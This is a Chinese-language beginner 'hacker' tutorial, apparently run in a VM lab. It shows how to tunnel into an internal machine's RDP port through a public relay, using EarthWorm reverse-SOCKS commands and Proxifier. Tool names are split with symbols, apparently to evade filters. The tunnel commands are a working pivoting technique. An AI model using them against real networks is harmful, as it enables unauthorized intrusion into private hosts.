很多人想学黑客知识,却不知如何入门,网上的教程也太繁琐,小白看了也头疼,那还是我来写黑客系列入门教程吧,跟着我做,你能黑客入门的。在第五课我们讲了如何转发一台有公网ip的3389端口,而且是本机之间的端口转发。这节课我们来讲一下,如何转发内网的一台机器的3389端口。我画了个思维导图,如下:
如果我的机器想要连接内网的192.168.126.128的3389端口,我们直接连接是连不通的,必须通过一台有公网ip的机器为媒介。我们在192.168.126.128机器上,通过工具earthworm反弹到有公网ip机器192.168.126.135,把192.168.126.135做成s△oc△ks服务器。我们本机再装一个pro△xi△fier,连接192.168.126.135,然后192.168.126.135就成为我们的一个媒介了,我们就可以直接连到192.168.126.128了。请注意,我把ip192.168.126.135都黑体标注了一下,是因为我是在用虚拟机给你写文章演示,在这篇文章中你把192.168.126.135这个ip当作是一个公网ip就行了。说起来很复杂,其实很简单,两个工具操作几步,配合就能完成了。
一、在192.168.126.135的机器上运行earthworm监听
命令是:ew.exe -s rc△so△cks -l 1080 -e 8888,注意看图里的命令。
命令里边的1080端口是把192.168.126.135做成s△oc△ks5监听的端口,8888是接收内网机器反弹的端口。这两个端口的数字你可以随便改的。
二、内网机器192.168.126.128执行命令反弹到192.168.126.135
命令是:ew -s rs△so△cks -d 192.168.126.135 -e 8888,此条命令的8888端口要和上文的8888端口对应。
此时,你的192.168.126.135的机器就有反应了。
三、本机装一个pro△xif△ier,做好s△o△ck△s5规则,打通通道
1、点击pro△xifi△er配置文件选项的△代△理服务器,再点填加
2、填加ip192.168.126.135为so△ck△s5服务器,1080端口要和第一条命令的1080端口对应。
3、现在直接你本机就可以打通了和内网机器192.168.126.128的通道了、你可以直接3389远程连上了。当然,其它的端口你也可以连上。
方法就是如此的简单。earthworm还有升级版,名字为termite,不过更为复杂了,所以我介绍earthworm给大家使用。earthworm和pr△oxi△fier都可以百度搜索到,所以我就不提供下载地址了,而且earthworm有linux版的,运行方法和本文是一样的。
另外,如果内网机器192.168.126.128不能上网,你有办法把它的端口转发出来吗?我给你个提示,如果内网还有一台192.168.126.127机器能上网,你完全可能利用192.168.126.127把192.168.126.128的端口转发出来的,自行去研究一下earthworm和pr△oxi△fier吧。
